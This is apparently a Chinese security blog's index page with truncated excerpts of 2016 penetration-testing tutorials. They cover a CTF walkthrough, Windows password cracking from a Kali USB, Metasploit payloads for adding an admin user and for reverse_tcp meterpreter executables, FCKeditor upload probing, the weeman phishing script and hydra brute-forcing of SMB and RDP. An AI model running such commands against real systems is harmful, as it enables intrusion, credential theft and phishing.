8年前 (2016-08-31) 9864浏览 1评论

在这篇文章中，我们将完成一个 CTF系列的 root2boot 挑战！这个演练将在 droopy 这个漏洞框架上完成，这是一个有一定难度的框架平台。我们可以从这里下载到：https://download.vulnhub.com/droopy/ 。 演...

8年前 (2016-08-28) 17226浏览 1评论

今天为大家介绍下，如何用Kali启动盘，来破解Windows登录密码。 首先，我们下载Kali的ISO文件，并用制作工具将Kali制作成U盘启动器。在这里我就不介绍制作过程了，只要按照官方说明就能轻易制作。下面直接进入主题。 将制作好的U盘插入PC ...

8年前 (2016-08-27) 6503浏览 0评论

今天为大家介绍几个MSF中比较有意思的 PAYLOAD 模块。 添加用户到管理员组： use windows/adduser set user secist set pass Secist.com set wmic true generate -t ...

8年前 (2016-08-27) 5258浏览 1评论

国内民间中小型网站有常见的”360网站卫士”,”百度云加速”,”云盾”,”安全宝”等 和国外这类CDN+云WAF的始祖”cloudflare&...

8年前 (2016-08-26) 4650浏览 0评论

weeman是一个由Python编写的脚本。它可以创建一个钓鱼页面，来窃取用户的信息。下面我们来看看，如何使用该脚本。 首先，让我们从github上进行下载。 github clone https://github.com/Hypsurus/weem...

8年前 (2016-08-25) 8288浏览 0评论

微软的“不安全dll加载”漏洞涉及Windows XP至Windows 7等多个版本的操作系统。由于Windows存在加载未指明完整路径的dll文件的机制，可能导致用户在使用第三方软件、玩游戏、听音乐时，会加载由木马 病毒伪装而成的dll文件，从而让...

8年前 (2016-08-24) 8482浏览 1评论

直接通过已知文件路径，爆出fck编辑器的版本信息： FCKeditor/_whatsnew.html 通过常用上传地址，来测试可上传点是否存在： FCKeditor/editor/filemanager/browser/default/connec...

8年前 (2016-08-21) 6598浏览 0评论

首先，我们先生成一个 PAYLOAD ： msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe 接着，我们来...

8年前 (2016-08-20) 9920浏览 1评论

00×01 首先，我们先来生成一个 meterpreter 类型的 PALOAD ： msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X &...

8年前 (2016-08-19) 8812浏览 0评论

破解smb服务密码： hydra -l administrator -P pass 192.168.2.3 smb 成功获取密码：123 破解rdp服务密码： hydra -l administrator -P pass 192.168.2.3 ...